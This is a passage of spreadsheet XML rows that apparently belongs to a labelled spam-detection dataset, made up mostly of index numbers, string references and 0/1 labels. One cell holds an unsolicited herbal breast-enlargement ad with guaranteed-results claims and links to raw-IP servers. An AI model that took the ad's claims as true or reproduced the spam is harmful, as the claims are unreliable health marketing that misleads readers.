      <c r="B1119" s="1" t="s">
        <v>1989</v>
      </c>
      <c r="C1119" s="1" t="s">
        <v>1990</v>
      </c>
      <c r="D1119" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" s="1">
        <v>1118.0</v>
      </c>
      <c r="B1120" s="1" t="s">
        <v>1991</v>
      </c>
      <c r="C1120" s="1" t="s">
        <v>1992</v>
      </c>
      <c r="D1120" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1121" hidden="1">
      <c r="A1121" s="1">
        <v>1119.0</v>
      </c>
      <c r="B1121" s="1" t="s">
        <v>1993</v>
      </c>
      <c r="C1121" s="1" t="s">
        <v>1994</v>
      </c>
      <c r="D1121" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1122" hidden="1">
      <c r="A1122" s="1">
        <v>1120.0</v>
      </c>
      <c r="B1122" s="1" t="s">
        <v>1995</v>
      </c>
      <c r="C1122" s="1" t="s">
        <v>1996</v>
      </c>
      <c r="D1122" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1123" hidden="1">
      <c r="A1123" s="1">
        <v>1121.0</v>
      </c>
      <c r="B1123" s="1" t="s">
        <v>1997</v>
      </c>
      <c r="C1123" s="1" t="s">
        <v>1998</v>
      </c>
      <c r="D1123" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1124" hidden="1">
      <c r="A1124" s="1">
        <v>1122.0</v>
      </c>
      <c r="B1124" s="1" t="s">
        <v>1999</v>
      </c>
      <c r="C1124" s="1" t="s">
        <v>2000</v>
      </c>
      <c r="D1124" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1125" hidden="1">
      <c r="A1125" s="1">
        <v>1123.0</v>
      </c>
      <c r="B1125" s="1" t="s">
        <v>2001</v>
      </c>
      <c r="C1125" s="1" t="s">
        <v>2002</v>
      </c>
      <c r="D1125" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1126" hidden="1">
      <c r="A1126" s="1">
        <v>1124.0</v>
      </c>
      <c r="B1126" s="1" t="s">
        <v>2003</v>
      </c>
      <c r="C1126" s="1" t="s">
        <v>2004</v>
      </c>
      <c r="D1126" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1127" hidden="1">
      <c r="A1127" s="1">
        <v>1125.0</v>
      </c>
      <c r="B1127" s="1" t="s">
        <v>2005</v>
      </c>
      <c r="C1127" s="1" t="s">
        <v>2006</v>
      </c>
      <c r="D1127" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="1">
        <v>1126.0</v>
      </c>
      <c r="B1128" s="1" t="s">
        <v>2007</v>
      </c>
      <c r="C1128" s="3" t="str">
        <f>================================
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  Increase  your bust by 1 to 3 sizes within 30-60 
 days and be all natural.  
 Click here:
 http://202.101.163.34:81/li/wangxd/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http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=zzzz@marchettieng.com
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D1128" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1129" hidden="1">
      <c r="A1129" s="1">
        <v>1127.0</v>
      </c>
      <c r="B1129" s="1" t="s">
        <v>1514</v>
      </c>
      <c r="C1129" s="1" t="s">
        <v>1515</v>
      </c>
      <c r="D1129" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1130" hidden="1">
      <c r="A1130" s="1">
        <v>1128.0</v>
      </c>
      <c r="B1130" s="1" t="s">
        <v>446</v>
      </c>
      <c r="C1130" s="1" t="s">
        <v>2008</v>
      </c>
      <c r="D1130" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1131" hidden="1">
      <c r="A1131" s="1">
        <v>1129.0</v>
      </c>
      <c r="B1131" s="1" t="s">
        <v>2009</v>
      </c>
      <c r="C1131" s="1" t="s">
        <v>2010</v>
      </c>
      <c r="D1131" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1132" hidden="1">
      <c r="A1132" s="1">
        <v>1130.0</v>
      </c>
      <c r="B1132" s="1" t="s">
        <v>272</v>
      </c>
      <c r="C1132" s="1" t="s">
        <v>273</v>
      </c>
      <c r="D1132" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1133" hidden="1">
      <c r="A1133" s="1">
        <v>1131.0</v>
      </c>
      <c r="B1133" s="1" t="s">
        <v>2011</v>
      </c>
      <c r="C1133" s="1" t="s">
        <v>2012</v>
      </c>
      <c r="D1133" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1134" hidden="1">
      <c r="A1134" s="1">
        <v>1132.0</v>
      </c>
      <c r="B1134" s="1" t="s">
        <v>2013</v>
      </c>
      <c r="C1134" s="1" t="s">
        <v>2014</v>
      </c>
      <c r="D1134" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1135" hidden="1">
      <c r="A1135" s="1">
        <v>1133.0</v>
      </c>
      <c r="B1135" s="1" t="s">
        <v>2015</v>
      </c>
      <c r="C1135" s="1" t="s">
        <v>2016</v>
      </c>
      <c r="D1135" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1136" hidden="1">
      <c r="A1136" s="1">
        <v>1134.0</v>
      </c>
      <c r="B1136" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C1136" s="1" t="s">
        <v>2017</v>
      </c>
      <c r="D1136" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1137" hidden="1">
      <c r="A1137" s="1">
        <v>1135.0</v>
      </c>
      <c r="B1137" s="1" t="s">
        <v>2018</v>
      </c>
      <c r="C1137" s="1" t="s">
        <v>2019</v>
      </c>
      <c r="D1137" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1138" hidden="1">
      <c r="A1138" s="1">
        <v>1136.0</v>
      </c>
      <c r="B1138" s="1" t="s">
        <v>2020</v>
      </c>
      <c r="C1138" s="1" t="s">
        <v>2021</v>
      </c>
      <c r="D1138" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="1">
        <v>1137.0</v>
      </c>
      <c r="B1139" s="1" t="s">
        <v>2022</v>
      </c>
      <c r="C1139" s="1" t="s">
        <v>2023</v>
      </c>
      <c r="D1139" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1140" hidden="1">
      <c r="A1140" s="1">
        <v>1138.0</v>
      </c>
      <c r="B1140" s="1" t="s">
        <v>2024</v>
      </c>
      <c r="C1140" s="1" t="s">
        <v>2025</v>
      </c>
      <c r="D1140" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1141" hidden="1">
      <c r="A1141" s="1">
        <v>1139.0</v>
      </c>
      <c r="B1141" s="1" t="s">
        <v>2026</v>
      </c>
      <c r="C1141" s="1" t="s">
        <v>2027</v>
      </c>
      <c r="D1141" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1142" hidden="1">
      <c r="A1142" s="1">
        <v>1140.0</v>
      </c>
      <c r="B1142" s="1" t="s">
        <v>2028</v>
      </c>
      <c r="C1142" s="1" t="s">
        <v>2029</v>
      </c>
      <c r="D1142" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1143" hidden="1">
      <c r="A1143" s="1">
        <v>1141.0</v>
      </c>
      <c r="B1143" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C1143" s="1" t="s">
        <v>1623</v>
      </c>
      <c r="D1143" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1144" hidden="1">
      <c r="A1144" s="1">
        <v>1142.0</v>
      </c>
      <c r="B1144" s="1" t="s">
        <v>2030</v>
      </c>
      <c r="C1144" s="1" t="s">
        <v>2031</v>
      </c>
      <c r="D1144" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="1">
        <v>1143.0</v>
      </c>
      <c r="B1145" s="1" t="s">
        <v>2032</v>
      </c>
      <c r="C1145" s="1" t="s">
        <v>2033</v>
      </c>
      <c r="D1145" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1146" hidden="1">
      <c r="A1146" s="1">
        <v>1144.0</v>
      </c>
      <c r="B1146" s="1" t="s">
        <v>367</v>
      </c>
      <c r="C1146" s="1" t="s">
        <v>2034</v>
      </c>
      <c r="D1146" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1147" hidden="1">
      <c r="A1147" s="1">
        <v>1145.0</v>
      </c>
      <c r="B1147" s="1" t="s">
        <v>2035</v>
      </c>
      <c r="C1147" s="1" t="s">
        <v>2036</v>
      </c>
      <c r="D1147" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1148" hidden="1">
      <c r="A1148" s="1">
        <v>1146.0</v>
      </c>
      <c r="B1148" s="1" t="s">
        <v>2037</v>
      </c>
      <c r="C1148" s="1" t="s">
        <v>2038</v>
      </c>
      <c r="D1148" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1149" hidden="1">
      <c r="A1149" s="1">
        <v>1147.0</v>
      </c>
      <c r="B1149" s="1" t="s">
        <v>2039</v>
      </c>
      <c r="C1149" s="1" t="s">
        <v>2040</v>
      </c>
      <c r="D1149" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1150" hidden="1">
      <c r="A1150" s="1">
        <v>1148.0</v>
      </c>
      <c r="B1150" s="1" t="s">
        <v>2041</v>
      </c>
      <c r="C1150" s="1" t="s">
        <v>2042</v>
      </c>
      <c r="D1150" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1151" hidden="1">
      <c r="A1151" s="1">
        <v>1149.0</v>
      </c>
      <c r="B1151" s="1" t="s">
        <v>2043</v>
      </c>
      <c r="C1151" s="1" t="s">
        <v>2044</v>
      </c>
      <c r="D1151" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1152" hidden="1">
      <c r="A1152" s="1">
        <v>1150.0</v>
      </c>
      <c r="B1152" s="1" t="s">
        <v>2045</v>
      </c>
      <c r="C1152" s="1" t="s">
        <v>2046</v>
      </c>
      <c r="D1152" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1153">
      <c r="A1153" s="1">
        <v>1151.0</v>
      </c>
      <c r="B1153" s="1" t="s">
        <v>515</v>
      </c>
      <c r="C1153" s="1" t="s">
        <v>516</v>
      </c>
      <c r="D1153" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1154">
      <c r="A1154" s="1">
        <v>1152.0</v>
      </c>
      <c r="B1154" s="1" t="s">
        <v>2047</v>
      </c>
      <c r="C1154" s="1" t="s">
        <v>2048</v>
      </c>
      <c r="D1154" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1155">
      <c r="A1155" s="1">
        <v>1153.0</v>
      </c>
      <c r="B1155" s="1" t="s">
        <v>2049</v>
      </c>
      <c r="C1155" s="1" t="s">
        <v>2050</v>
      </c>
      <c r="D1155" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1156" hidden="1">
      <c r="A1156" s="1">
        <v>1154.0</v>
      </c>
      <c r="B1156" s="1" t="s">
        <v>208</v>
      </c>
      <c r="C1156" s="1" t="s">
        <v>2051</v>
      </c>
      <c r="D1156" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1157" hidden="1">
      <c r="A1157" s="1">
        <v>1155.0</v>
      </c>
      <c r="B1157" s="1" t="s">
        <v>2052</v>
      </c>
      <c r="C1157" s="1" t="s">
        <v>2053</v>
      </c>
      <c r="D1157" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1158" hidden="1">
      <c r="A1158" s="1">
        <v>1156.0</v>
      </c>
      <c r="B1158" s="1" t="s">
        <v>2054</v>
      </c>
      <c r="C1158" s="1" t="s">
        <v>2055</v>
      </c>
      <c r="D1158" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1159" hidden="1">
      <c r="A1159" s="1">
        <v>1157.0</v>
      </c>
      <c r="B1159" s="1" t="s">
        <v>2056</v>
      </c>
      <c r="C1159" s="1" t="s">
        <v>2057</v>
      </c>
      <c r="D1159" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1160" hidden="1">
      <c r="A1160" s="1">
        <v>1158.0</v>
      </c>
      <c r="B1160" s="1" t="s">
        <v>745</v>
      </c>
      <c r="C1160" s="1" t="s">
        <v>2058</v>
      </c>
      <c r="D1160" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1161" hidden="1">
      <c r="A1161" s="1">
        <v>1159.0</v>
      </c>
      <c r="B1161" s="1" t="s">
        <v>2059</v>
      </c>
      <c r="C1161" s="1" t="s">
        <v>2060</v>
      </c>
      <c r="D1161" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1162" hidden="1">
      <c r="A1162" s="1">
        <v>1160.0</v>
      </c>
      <c r="B1162" s="1" t="s">
        <v>2061</v>
      </c>
      <c r="C1162" s="1" t="s">
        <v>2062</v>
      </c>
      <c r="D1162" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="1">
        <v>1161.0</v>
      </c>
      <c r="B1163" s="1" t="s">
        <v>1218</v>
      </c>
      <c r="C1163" s="1" t="s">
        <v>1219</v>
      </c>
      <c r="D1163" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1164" hidden="1">
      <c r="A1164" s="1">
        <v>1162.0</v>
      </c>
      <c r="B1164" s="1" t="s">
        <v>1797</v>
      </c>
      <c r="C1164" s="1" t="s">
        <v>2063</v>
      </c>
      <c r="D1164" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1165" hidden="1">
      <c r="A1165" s="1">
        <v>1163.0</v>
      </c>
      <c r="B1165" s="1" t="s">
        <v>2064</v>
      </c>
      <c r="C1165" s="1" t="s">
        <v>2065</v>
      </c>
      <c r="D1165" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="1">
        <v>1164.0</v>
      </c>
      <c r="B1166" s="1" t="s">
        <v>2066</v>
      </c>
      <c r="C1166" s="1" t="s">
        <v>2067</v>
      </c>
      <c r="D1166" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1167" hidden="1">
      <c r="A1167" s="1">
        <v>1165.0</v>
      </c>
      <c r="B1167" s="1" t="s">
        <v>2068</v>
      </c>
      <c r="C1167" s="1" t="s">
        <v>2069</v>
      </c>
      <c r="D1167" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1168" hidden="1">
      <c r="A1168" s="1">
        <v>1166.0</v>
      </c>
      <c r="B1168" s="1" t="s">
        <v>2070</v>
      </c>
      <c r="C1168" s="1" t="s">
        <v>2071</v>
      </c>
      <c r="D1168" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1169" hidden="1">
      <c r="A1169" s="1">
        <v>1167.0</v>
      </c>
      <c r="B1169" s="1" t="s">
        <v>2072</v>
      </c>
      <c r="C1169" s="1" t="s">
        <v>2073</v>
      </c>
      <c r="D1169" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="1">
        <v>1168.0</v>
      </c>
      <c r="B1170" s="1" t="s">
        <v>2074</v>
      </c>
      <c r="C1170" s="1" t="s">
        <v>2075</v>
      </c>
      <c r="D1170" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="1">
        <v>1169.0</v>
      </c>
      <c r="B1171" s="1" t="s">
        <v>2076</v>
      </c>
      <c r="C1171" s="1" t="s">
        <v>2077</v>
      </c>
      <c r="D1171" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1172" hidden="1">
      <c r="A1172" s="1">
        <v>1170.0</v>
      </c>
      <c r="B1172" s="1" t="s">
        <v>607</v>
      </c>
      <c r="C1172" s="1" t="s">
        <v>2078</v>
      </c>
      <c r="D1172" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1173" hidden="1">
      <c r="A1173" s="1">
        <v>1171.0</v>
      </c>
      <c r="B1173" s="1" t="s">
        <v>803</v>
      </c>
      <c r="C1173" s="1" t="s">
        <v>2079</v>
      </c>
      <c r="D1173" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="1">
        <v>1172.0</v>
      </c>
      <c r="B1174" s="1" t="s">
        <v>1751</v>
      </c>
      <c r="C1174" s="1" t="s">
        <v>1752</v>
      </c>
      <c r="D1174" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1175" hidden="1">
      <c r="A1175" s="1">
        <v>1173.0</v>
      </c>
      <c r="B1175" s="1" t="s">
        <v>2080</v>
      </c>
      <c r="C1175" s="1" t="s">
        <v>2081</v>
      </c>
      <c r="D1175" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1176" hidden="1">
      <c r="A1176" s="1">
        <v>1174.0</v>
      </c>
      <c r="B1176" s="1" t="s">
        <v>2082</v>
      </c>
      <c r="C1176" s="1" t="s">
        <v>2083</v>
      </c>
      <c r="D1176" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1177" hidden="1">
      <c r="A1177" s="1">
        <v>1175.0</v>
      </c>
      <c r="B1177" s="1" t="s">
        <v>1662</v>
      </c>
      <c r="C1177" s="1" t="s">
        <v>2084</v>
      </c>
      <c r="D1177" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1178" hidden="1">
      <c r="A1178" s="1">
        <v>1176.0</v>
      </c>
      <c r="B1178" s="1" t="s">
        <v>266</v>
      </c>
      <c r="C1178" s="1" t="s">
        <v>2085</v>
      </c>
      <c r="D1178" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1179" hidden="1">
      <c r="A1179" s="1">
        <v>1177.0</v>
      </c>
      <c r="B1179" s="1" t="s">
        <v>2086</v>
      </c>
      <c r="C1179" s="1" t="s">
        <v>2087</v>
      </c>
      <c r="D1179" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1180" hidden="1">
      <c r="A1180" s="1">
        <v>1178.0</v>
      </c>
      <c r="B1180" s="1" t="s">
        <v>1291</v>
      </c>
      <c r="C1180" s="1" t="s">
        <v>2088</v>
      </c>
      <c r="D1180" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1181" hidden="1">
      <c r="A1181" s="1">
        <v>1179.0</v>
      </c>
      <c r="B1181" s="1" t="s">
        <v>2089</v>
      </c>
      <c r="C1181" s="1" t="s">
        <v>2090</v>
      </c>
      <c r="D1181" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1182" hidden="1">
      <c r="A1182" s="1">
        <v>1180.0</v>
      </c>
      <c r="B1182" s="1" t="s">
        <v>713</v>
      </c>
      <c r="C1182" s="1" t="s">
        <v>714</v>
      </c>
      <c r="D1182" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1183">
      <c r="A1183" s="1">
        <v>1181.0</v>
      </c>
      <c r="B1183" s="1" t="s">
        <v>2091</v>
      </c>
      <c r="C1183" s="1" t="s">
        <v>2092</v>
      </c>
      <c r="D1183" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1184" hidden="1">
      <c r="A1184" s="1">
        <v>1182.0</v>
      </c>
      <c r="B1184" s="1" t="s">
        <v>2093</v>
      </c>
      <c r="C1184" s="1" t="s">
        <v>2094</v>
      </c>
      <c r="D1184" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1185" hidden="1">
      <c r="A1185" s="1">
        <v>1183.0</v>
      </c>
      <c r="B1185" s="1" t="s">
        <v>2095</v>
      </c>
      <c r="C1185" s="1" t="s">
        <v>2096</v>
      </c>
      <c r="D1185" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1186">
      <c r="A1186" s="1">
        <v>1184.0</v>
      </c>
      <c r="B1186" s="1" t="s">
        <v>2097</v>
      </c>
      <c r="C1186" s="1" t="s">
        <v>2098</v>
      </c>
      <c r="D1186" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1187">
      <c r="A1187" s="1">
        <v>1185.0</v>
      </c>
      <c r="B1187" s="1" t="s">
        <v>2099</v>
      </c>
      <c r="C1187" s="1" t="s">
        <v>2100</v>
      </c>
      <c r="D1187" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1188" hidden="1">
      <c r="A1188" s="1">
        <v>1186.0</v>
      </c>
      <c r="B1188" s="1" t="s">
        <v>2101</v>
      </c>
      <c r="C1188" s="1" t="s">
        <v>2102</v>
      </c>
      <c r="D1188" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1189" hidden="1">
      <c r="A1189" s="1">
        <v>1187.0</v>
      </c>
      <c r="B1189" s="1" t="s">
        <v>375</v>
      </c>
      <c r="C1189" s="1" t="s">
        <v>376</v>
      </c>
      <c r="D1189" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1190">
      <c r="A1190" s="1">
        <v>1188.0</v>
      </c>
      <c r="B1190" s="1" t="s">
        <v>179</v>
      </c>
      <c r="C1190" s="1" t="s">
        <v>180</v>
      </c>
      <c r="D1190" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1191" hidden="1">
      <c r="A1191" s="1">
        <v>1189.0</v>
      </c>
      <c r="B1191" s="1" t="s">
        <v>2103</v>
      </c>
      <c r="C1191" s="1" t="s">
        <v>2104</v>
      </c>
      <c r="D1191" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1192" hidden="1">
      <c r="A1192" s="1">
        <v>1190.0</v>
      </c>
      <c r="B1192" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="C1192" s="1" t="s">
        <v>2105</v>
      </c>
      <c r="D1192" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1193" hidden="1">
      <c r="A1193" s="1">
        <v>1191.0</v>
      </c>
      <c r="B1193" s="1" t="s">
        <v>2106</v>
      </c>
      <c r="C1193" s="1" t="s">
        <v>2107</v>
      </c>
      <c r="D1193" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1194" hidden="1">
      <c r="A1194" s="1">
        <v>1192.0</v>
      </c>
      <c r="B1194" s="1" t="s">
        <v>2108</v>
      </c>
      <c r="C1194" s="1" t="s">
        <v>2109</v>
      </c>
      <c r="D1194" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1195" hidden="1">
      <c r="A1195" s="1">
        <v>1193.0</v>
      </c>
      <c r="B1195" s="1" t="s">
        <v>2110</v>
      </c>
      <c r="C1195" s="1" t="s">
        <v>2111</v>
      </c>
      <c r="D1195" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1196" hidden="1">
      <c r="A1196" s="1">
        <v>1194.0</v>
      </c>
      <c r="B1196" s="1" t="s">
        <v>2112</v>
      </c>
      <c r="C1196" s="1" t="s">
        <v>2113</v>
      </c>
      <c r="D1196" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1197" hidden="1">
      <c r="A1197" s="1">
        <v>1195.0</v>
      </c>
      <c r="B1197" s="1" t="s">
        <v>827</v>
      </c>
      <c r="C1197" s="1" t="s">
        <v>2114</v>
      </c>
      <c r="D1197" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1198" hidden="1">
      <c r="A1198" s="1">
        <v>1196.0</v>
      </c>
      <c r="B1198" s="1" t="s">
        <v>2115</v>
      </c>
      <c r="C1198" s="1" t="s">
        <v>2116</v>
      </c>
      <c r="D1198" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" s="1">
        <v>1197.0</v>
      </c>
      <c r="B1199" s="1" t="s">
        <v>2117</v>
      </c>
      <c r="C1199" s="1" t="s">
        <v>2118</v>
      </c>
      <c r="D1199" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1200" hidden="1">
      <c r="A1200" s="1">
        <v>1198.0</v>
      </c>
      <c r="B1200" s="1" t="s">
        <v>601</v>
      </c>
      <c r="C1200" s="1" t="s">
        <v>2119</v>
      </c>
      <c r="D1200" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1201" hidden="1">
      <c r="A1201" s="1">
        <v>1199.0</v>
      </c>
      <c r="B1201" s="1" t="s">
        <v>2120</v>
      </c>
      <c r="C1201" s="1" t="s">
        <v>2121</v>
      </c>
      <c r="D1201" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1202" hidden="1">
      <c r="A1202" s="1">
        <v>1200.0</v>
      </c>
      <c r="B1202" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="C1202" s="1" t="s">
        <v>2122</v>
      </c>
      <c r="D1202" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1203" hidden="1">
      <c r="A1203" s="1">
        <v>1201.0</v>
      </c>
      <c r="B1203" s="1" t="s">
        <v>2123</v>
      </c>
      <c r="C1203" s="1" t="s">
        <v>2124</v>
      </c>
      <c r="D1203" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" s="1">
        <v>1202.0</v>
      </c>
      <c r="B1204" s="1" t="s">
        <v>2125</v>
      </c>
      <c r="C1204" s="1" t="s">
        <v>2126</v>
      </c>
      <c r="D1204" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1205" hidden="1">
      <c r="A1205" s="1">
        <v>1203.0</v>
      </c>
      <c r="B1205" s="1" t="s">
        <v>2127</v>
      </c>
      <c r="C1205" s="1" t="s">
        <v>2128</v>
      </c>
      <c r="D1205" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1206" hidden="1">
      <c r="A1206" s="1">
        <v>1204.0</v>
      </c>
      <c r="B1206" s="1" t="s">
        <v>2129</v>
      </c>
      <c r="C1206" s="1" t="s">
        <v>2130</v>
      </c>
      <c r="D1206" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1207" hidden="1">
      <c r="A1207" s="1">
        <v>1205.0</v>
      </c>
      <c r="B1207" s="1" t="s">
        <v>2131</v>
      </c>
      <c r="C1207" s="1" t="s">
        <v>2132</v>
      </c>
      <c r="D1207" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1208" hidden="1">
      <c r="A1208" s="1">
        <v>1206.0</v>
      </c>
      <c r="B1208" s="1" t="s">
        <v>846</v>
      </c>
      <c r="C1208" s="1" t="s">
        <v>2133</v>
      </c>
      <c r="D1208" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1209" hidden="1">
      <c r="A1209" s="1">
        <v>1207.0</v>
      </c>
      <c r="B1209" s="1" t="s">
        <v>2134</v>
      </c>
      <c r="C1209" s="1" t="s">
        <v>2135</v>
      </c>
      <c r="D1209" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1210" hidden="1">
      <c r="A1210" s="1">
        <v>1208.0</v>
      </c>
      <c r="B1210" s="1" t="s">
        <v>2136</v>
      </c>
      <c r="C1210" s="1" t="s">
        <v>2137</v>
      </c>
      <c r="D1210" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="1">
        <v>1209.0</v>
      </c>
      <c r="B1211" s="1" t="s">
        <v>456</v>
      </c>
      <c r="C1211" s="1" t="s">
        <v>457</v>
      </c>
      <c r="D1211" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="1">
        <v>1210.0</v>
      </c>
      <c r="B1212" s="1" t="s">
        <v>643</v>
      </c>
      <c r="C1212" s="1" t="s">
        <v>644</v>
      </c>
      <c r="D1212" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1213" hidden="1">
      <c r="A1213" s="1">
        <v>1211.0</v>
      </c>
      <c r="B1213" s="1" t="s">
        <v>2138</v>
      </c>
      <c r="C1213" s="1" t="s">
        <v>2139</v>
      </c>
      <c r="D1213" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1214" hidden="1">
      <c r="A1214" s="1">
        <v>1212.0</v>
      </c>
      <c r="B1214" s="1" t="s">
        <v>846</v>
      </c>
      <c r="C1214" s="1" t="s">
        <v>2140</v>
      </c>
      <c r="D1214" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1215" hidden="1">
      <c r="A1215" s="1">
        <v>1213.0</v>
      </c>
      <c r="B1215" s="1" t="s">
        <v>1181</v>
      </c>
      <c r="C1215" s="1" t="s">
        <v>2141</v>
      </c>
      <c r="D1215" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1216" hidden="1">
      <c r="A1216" s="1">
        <v>1214.0</v>
      </c>
      <c r="B1216" s="1" t="s">
        <v>736</v>
      </c>
      <c r="C1216" s="1" t="s">
        <v>737</v>
      </c>
      <c r="D1216" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1217" hidden="1">
      <c r="A1217" s="1">
        <v>1215.0</v>
      </c>
      <c r="B1217" s="1" t="s">
        <v>1325</v>
      </c>
      <c r="C1217" s="1" t="s">
        <v>2142</v>
      </c>
      <c r="D1217" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="1">
        <v>1216.0</v>
      </c>
      <c r="B1218" s="1" t="s">
        <v>2143</v>
      </c>
      <c r="C1218" s="1" t="s">
        <v>2144</v>
      </c>
      <c r="D1218" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1219" hidden="1">
      <c r="A1219" s="1">
        <v>1217.0</v>
      </c>
      <c r="B1219" s="1" t="s">
        <v>2015</v>
      </c>
      <c r="C1219" s="1" t="s">
        <v>2016</v>
      </c>
      <c r="D1219" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1220" hidden="1">
      <c r="A1220" s="1">
        <v>1218.0</v>
      </c>
      <c r="B1220" s="1" t="s">
        <v>846</v>
      </c>
      <c r="C1220" s="1" t="s">
        <v>2145</v>
      </c>
      <c r="D1220" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1221" hidden="1">
      <c r="A1221" s="1">
